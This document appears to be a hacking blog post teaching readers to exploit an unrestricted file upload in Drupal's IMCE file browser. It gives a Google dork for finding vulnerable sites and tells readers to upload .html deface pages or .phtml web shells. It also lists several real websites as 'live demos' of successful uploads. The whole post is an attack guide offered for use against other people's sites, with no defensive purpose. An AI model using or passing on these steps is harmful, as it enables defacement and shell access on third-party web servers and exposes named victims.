Durpal IMCE Mkdir remote deface upload exploit
Durpal IMCE Mkdir remote deface upload exploit
Google Dork : inurl:"/imce?dir=" intitle:"File Browser"
exploit : http://website.com/imce?dir=
Shell Access : http://website.com/files/yourfilehere
http://www.website.com/abc/files/abc/yourfilehere
http://www.website.com/abc/files/abc/yourfilehere
IMCE Mkdir is a remote file upload vulnerablity on durpal platform,1st of all find a vulnerable website using google dork
normaly you can upload .txt extentions on websites
but some sites allowes you to upload .html files
if you want to upload shell on website then try in .phtml extention
after opening site goto http://website.com/imce?dir=
and file upload option there
to acess your shell/deface/file go here
http://www.website.com/abc/files/abc/yourfilehere
Live demo : http://labourlakesandfurness.co.uk/imce?dir=
Result: http://labourlakesandfurness.co.uk/sites/labourlakesandfurness.co.uk/files/test.html
http://www.website.com/abc/files/abc/yourfilehere
(replace abc with directory of website)
Leave comment if any query :) stay connected for More !
Live demo : http://labourlakesandfurness.co.uk/imce?dir=
Result: http://labourlakesandfurness.co.uk/sites/labourlakesandfurness.co.uk/files/test.html
Other demos
http://correaporto.com.br/english/imce?dir=.
http://www.somaly.org/imce?dir=
http://1daygraphics.com/imce?dir=client
Tags: Cool Tricks, Exploit, Vulnerability, Web Application Security, Website Hacking
Previous Article
Subscribe to:
Post Comments (Atom)
Share your views...
0 Respones to "Durpal IMCE Mkdir remote deface upload exploit"
Post a Comment